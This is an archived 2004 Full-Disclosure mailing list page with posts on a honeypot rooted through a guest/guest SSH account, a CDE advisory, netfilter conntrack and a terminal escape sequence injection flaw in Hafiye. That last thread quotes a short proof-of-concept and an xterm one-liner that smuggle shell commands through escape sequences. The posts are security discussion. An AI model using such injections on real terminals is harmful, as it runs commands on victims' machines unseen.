|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- application/octet-stream attachment: Half_Live.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
RE: !SPAM! [Full-Disclosure] Automated ssh scanning
From: Richard Verwayen (holle
ackw.de)
Date: Thu Aug 26 2004 - 06:07:35 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Thu, 2004-08-26 at 11:47, Yaakov Yehudi wrote:
> In spite of many reports to the contrary, Linux is _not_ secure by default.
> Did you harden it? There is a lot of documentation on the web as to how to
> go about it.
>
> YY
Hello Yaakov,
This system was a pure debian woody none-production one with all
services disabled - just ssh was left open in order to see for what
purpose the scan was! Yes, there was a guest account with a weak
passwort (guest) on it!
And yes, they logged in and became root in no time. But I thought the
kernel compiled from the latest debian woody kernel-source could be
considered to be save. But I was wrong! So I posted the tools used by
the attackers to this list and also to the debian security team.
Richard
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] iDEFENSE Security Advisory 08.25.04:
From: Anonymous (criptoecn.org)
Date: Thu Aug 26 2004 - 02:37:00 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
At 01:45 PM 8/25/2004 -0400, idlabs-advisoriesidefense.com wrote:
>CDE libDtHelp LOGNAME Buffer Overflow Vulnerability
>US-CERT Vulnerability Note VU#575804, detailing the original attack
>vectors is available at:
>
>http://www.kb.cert.org/vuls/id/575804
>iDEFENSE has confirmed the existence of this vulnerability in Solaris 8
>and Solaris 9 without the patches provided for in Sun Alert 57414.
>VIII. DISCLOSURE TIMELINE
>
>03/04/2004 Initial vendor contact
> (Opengroup.org)
>03/04/2004 iDEFENSE clients notified
>03/31/2004 Initial vendor response
> (Opengroup.org - further coordination requested)
>04/19/2004 Initial vendor contact
> (Hewlett-Packard, IBM, and Sun Microsystems)
>04/19/2004 Initial vendor response (Sun Microsystems)
>04/20/2004 Initial vendor response (Hewlett-Packard)
>08/25/2004 Public disclosure
I am confused. Sun patched this on 30 April. HP Patched as recently as February. IBM in November. The last change to the CERT VN was 4 November.
Why "disclose" this now?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] Re: Hafiye-1.0 Terminal Escape Sequence Injection Vulnerability
From: Serkan Akpolat (sakpolatgmx.net)
Date: Tue Aug 24 2004 - 12:24:50 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Rodrigo Barbosa wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Mon, Aug 23, 2004 at 09:32:15PM +0300, Serkan Akpolat wrote:
>
>>char *esc_sequence[]= {"Escape Sequences",
>> "\x1b""]2;Insecure?""\x07\x0a",
>> "\x07\x07\x07\x07\x07\x07",
>> "\x1b""]2;;echo Owned > /root/Owned.txt"
>> "\x07\x1b""[21t""\x1b""]2;xterm""\x07"
>> "Abnormal Termination""\x1b"
>> "[8m;""\x0a"};
>
>
> Looks like a traditional ANSI escape code "exploit" (or should I say
abuse ?).
> I would blame this on the terminal, nor on the Hafiye software itself.
>
> []s
>
> - --
> Rodrigo Barbosa <rodrigobsuespammers.org>
> "Quid quid Latine dictum sit, altum viditur"
> "Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.3 (GNU/Linux)
>
> iD8DBQFBK2TPpdyWzQ5b5ckRAmQmAKCC/JHgqFew7X5MPg7JwIZWGT3ZywCfURNQ
> Lg02GiczNMHvLbitgXLSc6c=
> =qau0
> -----END PGP SIGNATURE-----
>
>
Well i would not blame this on terminal emulators.
And the escape sequences in the poc exploit i wrote are not related with
ANSI escape code "exploit".
They are features of terminal emulators.
echo -e "\e]2;;ls;\a\e[21t\abash-2.05b$\e[8m;"
You can try this one in xterm.You will see bash-2.05b$ , if you type
some command and hit enter, "ls" command in the escape sequence will be
executed too. (thanks to bloofar for the hint)
You can read more on "TERMINAL EMULATOR SECURITY ISSUES" paper written
by H D Moore. The paper also covers old vulnerabilities in terminal
emulators.
###########################################
This message has been scanned by F-Secure Anti-Virus for Microsoft
Exchange.
For more information, connect to http://www.F-Secure.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] Automated ssh scanning
andreasinferno.nadir.org
Date: Thu Aug 26 2004 - 03:47:51 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi,
do you have an image you can share with us?
did you setup key logging?
if not, setup your honeypot again with better control about, what
the intruder is doing.
regards,
andreas
On Thursday 26 August 2004 09:14, Richard Verwayen wrote:
> On Thu, 2004-08-26 at 03:11, David Vincent wrote:
> > >Hello list!
> > >
> > >A few weeks ago there was a discussion about automated ssh scanning with
> > >user/password combinations like guest/guest or admin/admin.
> > >I set up a debian woody fully patched with both accounts activated, and
> > >got rooted some days later...
> > >
> > >The attackers installed some software and irc-bots and tried to use this
> > >host for testing other computers, thats not the point. I would like to
> > >know where's the weak point in the system? As the system was updates on
> > >a daily base! The only known weakness were these two accounts!
> >
> > you didn't set up admin/admin as root did you?
> >
> > just asking.
> >
> > -d
>
> Hello David,
>
> no I created only unprivileged user accounts! And the root password is
> not considered to be weak!
>
> Richard
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] Automated ssh scanning
From: Tig (tiggeronemoremonkey.com)
Date: Thu Aug 26 2004 - 07:31:35 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Wed, 25 Aug 2004 19:43:47 -0400
Gerry Eisenhaur <GEisenhaurCisco.com> wrote:
> I am confused, you said you knew about some SSH scanning going on,
> then set up those accounts on a box. Now you are curious way that box
> got rooted?
>
> Maybe I am missing something, but it seems you already have a pretty
> good assumption of why it got rooted.
>
> The software, as you seem to know, is a few exploits, a backdoor and
> some IRC stuff(bot and proxy).
>
> /gerry
>
I think you did miss the point (which was a very good one). Basically,
once you have unprivileged access to a currently patched Woody box, you
can quickly gain root access.
I would love to see this tested against other version of Linux and *BSD
with default (and updated) installations. Anyone have a spare box and a
few hours?
-Tig
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
RE: !SPAM! [Full-Disclosure] Automated ssh scanning
From: Todd Towles (toddtowlesbrookshires.com)
Date: Thu Aug 26 2004 - 08:12:08 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
The kernel could be save. But with weak passwords, you are toast. Any
automated tool would test guest/guest.
-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Richard
Verwayen
Sent: Thursday, August 26, 2004 6:08 AM
To: 'FD'
Subject: RE: !SPAM! [Full-Disclosure] Automated ssh scanning
On Thu, 2004-08-26 at 11:47, Yaakov Yehudi wrote:
> In spite of many reports to the contrary, Linux is _not_ secure by
default.
> Did you harden it? There is a lot of documentation on the web as to
> how to go about it.
>
> YY
Hello Yaakov,
This system was a pure debian woody none-production one with all
services disabled - just ssh was left open in order to see for what
purpose the scan was! Yes, there was a guest account with a weak
passwort (guest) on it!
And yes, they logged in and became root in no time. But I thought the
kernel compiled from the latest debian woody kernel-source could be
considered to be save. But I was wrong! So I posted the tools used by
the attackers to this list and also to the debian security team.
Richard
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
RE: !SPAM! [Full-Disclosure] Automated ssh scanning
From: Richard Verwayen (holleackw.de)
Date: Thu Aug 26 2004 - 08:41:18 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Thu, 2004-08-26 at 15:12, Todd Towles wrote:
> The kernel could be save. But with weak passwords, you are toast. Any
> automated tool would test guest/guest.
>
Hello Todd!
You are right about the passwords, but guest is only a unprivileged
account as you may have on many prodruction machines. But they managed
to become root on this machine due to a kernel(?) exploit!
Should I then consider any woody system to be insecure to let people
work at?
Richard
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] Automated ssh scanning
From: Gerry Eisenhaur (GEisenhaurCisco.com)
Date: Thu Aug 26 2004 - 09:06:42 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Yea I boned it, I missed the point. For some reason (read: lack of sleep
and food), I miss-read/assumed that admin was an admin...stupid me...
/gerry
Tig wrote:
> On Wed, 25 Aug 2004 19:43:47 -0400
> Gerry Eisenhaur <GEisenhaurCisco.com> wrote:
>
>
>>I am confused, you said you knew about some SSH scanning going on,
>>then set up those accounts on a box. Now you are curious way that box
>>got rooted?
>>
>>Maybe I am missing something, but it seems you already have a pretty
>>good assumption of why it got rooted.
>>
>>The software, as you seem to know, is a few exploits, a backdoor and
>>some IRC stuff(bot and proxy).
>>
>>/gerry
>>
>
>
> I think you did miss the point (which was a very good one). Basically,
> once you have unprivileged access to a currently patched Woody box, you
> can quickly gain root access.
>
> I would love to see this tested against other version of Linux and *BSD
> with default (and updated) installations. Anyone have a spare box and a
> few hours?
>
> -Tig
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
--
Gerald Eisenhaur
Cisco Systems, Inc.
1414 Massachusetts Ave.
Boxborough, MASSACHUSETTS 01719
tel: 978.936.0465
geisenhaurcisco.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
RE: [Full-Disclosure] Automated ssh scanning
From: Todd Towles (toddtowlesbrookshires.com)
Date: Thu Aug 26 2004 - 09:03:46 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Sorry, didn't see the other messages. So it get local access thru
guest/guest and then gained root with a local exploit. Any ideas what it
is?
-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Todd Towles
Sent: Thursday, August 26, 2004 8:12 AM
To: Richard Verwayen; FD
Subject: RE: !SPAM! [Full-Disclosure] Automated ssh scanning
The kernel could be save. But with weak passwords, you are toast. Any
automated tool would test guest/guest.
-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Richard
Verwayen
Sent: Thursday, August 26, 2004 6:08 AM
To: 'FD'
Subject: RE: !SPAM! [Full-Disclosure] Automated ssh scanning
On Thu, 2004-08-26 at 11:47, Yaakov Yehudi wrote:
> In spite of many reports to the contrary, Linux is _not_ secure by
default.
> Did you harden it? There is a lot of documentation on the web as to
> how to go about it.
>
> YY
Hello Yaakov,
This system was a pure debian woody none-production one with all
services disabled - just ssh was left open in order to see for what
purpose the scan was! Yes, there was a guest account with a weak
passwort (guest) on it!
And yes, they logged in and became root in no time. But I thought the
kernel compiled from the latest debian woody kernel-source could be
considered to be save. But I was wrong! So I posted the tools used by
the attackers to this list and also to the debian security team.
Richard
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
RE: !SPAM! [Full-Disclosure] Automated ssh scanning
From: Todd Towles (toddtowlesbrookshires.com)
Date: Thu Aug 26 2004 - 09:19:18 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
That is a worry you should have. But we need to know how they did it
before we just assume it. Anyone test it on another linux system?
Fedora?
-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Richard
Verwayen
Sent: Thursday, August 26, 2004 8:41 AM
To: FD
Subject: RE: !SPAM! [Full-Disclosure] Automated ssh scanning
On Thu, 2004-08-26 at 15:12, Todd Towles wrote:
> The kernel could be save. But with weak passwords, you are toast. Any
> automated tool would test guest/guest.
>
Hello Todd!
You are right about the passwords, but guest is only a unprivileged
account as you may have on many prodruction machines. But they managed
to become root on this machine due to a kernel(?) exploit!
Should I then consider any woody system to be insecure to let people
work at?
Richard
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] Netfilter Conntrack
From: Maxime Ducharme (mducharmecybergeneration.com)
Date: Thu Aug 26 2004 - 09:01:42 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi
I beleive function ctnl_del_conntrack from libctnetlink.c
may be helpful.
http://cvs.netfilter.org/libctnetlink/libctnetlink.c
netfilter-dev people do alot of work and do not always have time
to answer every questions, maybe being patient in the future
may help
This is open-source software and people do contributions on
their personal time ...
Hope this helps
Have a nice day
Maxime Ducharme
Programmeur / Spécialiste en sécurité réseau
----- Original Message -----
From: VeNoMouS
To: full-disclosurelists.netsys.com
Sent: Monday, August 23, 2004 11:42 PM
Subject: [Full-Disclosure] Netfilter Conntrack
I know this is so not the right place to ask this, but most of the people
from netfilter-dev are total asshats and trying to get any sort of info from
them is a bitch.
</rant>
Does any one know of a decent way to delete an entry from the conntrack ( in
c ) ive written an lkm to try access ip_conntrack_tuple and ip_conntrack to
list and delete from there but so far my attempts have been worthless.
so im asking you guys for HELP!#!!!!
chur VeNoMouS....
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
RE: !SPAM! [Full-Disclosure] Automated ssh scanning
From: Ron DuFresne (dufresnewinternet.com)
Date: Thu Aug 26 2004 - 09:43:13 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Thu, 26 Aug 2004, Richard Verwayen wrote:
> On Thu, 2004-08-26 at 15:12, Todd Towles wrote:
> > The kernel could be save. But with weak passwords, you are toast. Any
> > automated tool would test guest/guest.
> >
> Hello Todd!
>
> You are right about the passwords, but guest is only a unprivileged
> account as you may have on many prodruction machines. But they managed
> to become root on this machine due to a kernel(?) exploit!
> Should I then consider any woody system to be insecure to let people
> work at?
If your uasers are not trustable, then they should not have access to
local systems of yours. Once a person has a shell, then they are 95% to
root.
Thanks,
Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] Notification
From: Advisories (advisoriescorsaire.com)
Date: Thu Aug 26 2004 - 10:27:04 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]